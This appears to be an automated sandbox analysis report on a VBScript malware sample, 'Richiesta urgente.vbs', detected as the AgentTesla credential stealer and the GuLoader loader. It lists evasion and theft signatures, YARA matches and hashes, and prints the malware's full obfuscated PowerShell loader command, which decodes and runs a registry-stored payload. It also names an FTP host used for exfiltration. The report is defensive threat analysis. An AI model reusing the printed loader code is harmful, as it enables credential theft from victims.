
Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name: Richiesta urgente.vbs
Analysis ID: 755115
MD5: de0edf01710a38b1e96688ae2f712ebb
SHA1: 6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256: 20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags: vbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 4088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 1004 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5840 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe 
hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAgeNurSu3Ke2Ma`"""Fo)fl]DepdiuCibStlOuiSecBi ScsHytBjalitFliDrcBl ToeCoxBytFoeGarRenPo SeitunMetDa UnGMoeprtHaKFoefoyNeSBotMuaGrtFeeSk(BaiVinSttNo SkFFooUnrGe)Di;lo[ByDPelTulMiIMimKapCooInrPutxe(Un`"""RegCydWoiDo3Me2Us`"""St)Be]KopMauHybBolEdiLvcRe SksDatFlaTitdaiChcDr EneMexFetTaeTorWenKl BriErnThtRe LaPAloPelGiySoTBueCrxSetDiOInuBetKo(VeiNanEmtRe UfFFoeSpeSidInsSttSt,YoiPanBltLe ElFOblSpoUrrKieFu,NeiEtnEltPs TrLRaiBemAn)Be;Br[UbDArlMylStIismStpAcoHerLytHe(vl`"""SuuUnsPreAfrhj3Kr2Pr`"""Un)Un]IspPauSrbPalSmicocma FrsretBoaSttBeiancPr OweBoxKotFaeUrrSnnSu FriStnUntma AnESaxUrcTrlliuPrdBrePsUBepTodDoaUntArePoRAugMonBy(DeiKlnHatVa PaUMunAbdPr1Ba3Ti7Le,UniSknAntSk UnKSonUniUnrPo)Ni;Sk[MiDaslEklStIUnmRkptroCarUntEl(Kr`"""TikCueDyrVanBreIdlUn3Bo2Di`"""po)Su]IdpenudrbTmlOpiGrcfl MesMatKhaDotDiiSycAs LaeOvxRetUreGrrUsnst OuivinPetBe KoSAreXatFrCMioAinFlsLooUnlOpeTeMOdoLodGoecr(sciMunsutCh LvCYdrKoaChvVeaUntTa,iniApnlstNs 
RuSGovgrmKumKr)Th;Pa[ElDDilStlviISamTepKooAfrFotMa(la`"""SikAeeDdrafnToeSnlCa3Ob2Ag`"""St)he]TepInuStbFolPeiPrcan PosphtSyaudtSoiDecBl OueSaxNotNoeBerLanPo TeIVanSatRePPrtLarBl LaEArnSyuTrmnoSReyDesSktRaeKlmBlLPaoTecImaUtlAneDisPeWMe(KauLyiDenOvttn CrvAc1Cu,SjilonAmtOy SavKa2St)Ti;Be}Ti'De;br`$PrRReeSkaEmbRerPhiSvdKogKueUrdYo3Ts=Ba[FyRtieMaaNobSmrHoiLidUdgBieReddr1Id]Co:Af:GlVBriExrMetFouInaImlReAGrllalAkoKocDi(Un0Ud,No1In0Pa4Ef8at5Ca7Ta6ul,Ch1ud2Ha2Ha8Ud8Be,Bo6Ve4Sy)do;Sc`$FeHPaeDraFjdStbEiaOmnaldFosCr=Tv(KvGRoeSjtTu-siIKrtAbeApmSaPParEkoLypsoeChrUdtHeySt Fl-ToPgraPotSnhBi Ge'UnHToKDaCSaUAf:Al\FlAApnCotTaaPrrRi\OvHmiaSlnBadBrlGniKonUdgPrsGo'un)Mi.TiDHjeortOseWokGrtBreAlrCaiPinFygFoeGurEsnAdeKksLo;Un`$BoTRewReihenReeTh Kr=Ls Ov[MeSVeyOpsVetAzeMymAu.OmCThoAgnPivSwelarTotEl]Ne:Vg:ReFserMeoismInBEraTrsDeeAb6Po4SpSRetacrLeiinnDegPa(Ra`$ClHBeeVoaBodUnbBeaPonBedDisLo)Le;Ti[UnSTryOfsPatCleShmRe.SeRReuMinSttFoiAemCueEl.TrITunBhtEveErrProKopTrSNyeRergevLeiPhcKrePhsEd.seMSuaFirunsPrhAaaDelSo]Ej:Pr:WrCReoHypDeyGr(Ho`$AgTRewFoidinTaeSt,Fo Ca0Sc,Wi Th Ca`$EkRCyePoaQubdirPsividOpgRaeDadOs3do,Ku Ga`$MiTMawUniefnBreFo.TrcRvoFiuRanbytSp)Su;Pa[afRFoeJuaRebChrUniPldmngIneSedCo1lo]Tu:Af:NyEIcnBluRemGuSOsyCesPrtDieDimItLProBicToaDalSaeHasTrWDe(Fi`$SoRIneFoaGabEjrKeiPodRegSieTodSa3lu,Is Eg0fe)pi#Vo;""";Function Reabridged4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Regionplanarbejderne = $Regionplanarbejderne + $HS.Substring($i, 1); } $Regionplanarbejderne;}$Enterprise0 = Reabridged4 'GrITyEDoXLy ';$Enterprise1= Reabridged4 $Skolegaardene;&$Enterprise0 $Enterprise1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4416 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1076 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 6072 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
Source: Richiesta urgente.vbs
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0xa34:$s1: .CreateObject("WScript.Shell")
  • 0x3f562:$p1: powershell.exe
  • 0x4c69c:$p1: powershell.exe
Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_AgentTesla_1
Description: Yara detected AgentTesla
Author: Joe Security

Source: 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

Source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

Source: Process Memory Space: powershell.exe PID: 5840
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x15ed6:$b2: ::FromBase64String(
  • 0x5e98a:$b2: ::FromBase64String(
  • 0x17beb2:$b2: ::FromBase64String(
  • 0x268a5:$s1: -join
  • 0x27005:$s1: -join
  • 0xb3272:$s1: -join
  • 0xc0347:$s1: -join
  • 0xc3719:$s1: -join
  • 0xc3dcb:$s1: -join
  • 0xc58bc:$s1: -join
  • 0xc7ac2:$s1: -join
  • 0xc82e9:$s1: -join
  • 0xc8b59:$s1: -join
  • 0xc9294:$s1: -join
  • 0xc92c6:$s1: -join
  • 0xc930e:$s1: -join
  • 0xc932d:$s1: -join
  • 0xc9b7d:$s1: -join
  • 0xc9cf9:$s1: -join
  • 0xc9d71:$s1: -join
  • 0xc9e04:$s1: -join
Source: amsi64_4088.amsi.csv
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1d9:$p1: powershell.exe

Data Obfuscation

          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn 
PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""U
No Snort rule has matched


AV Detection

Source: ftp.mcmprint.net, Virustotal: Detection: 9%
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp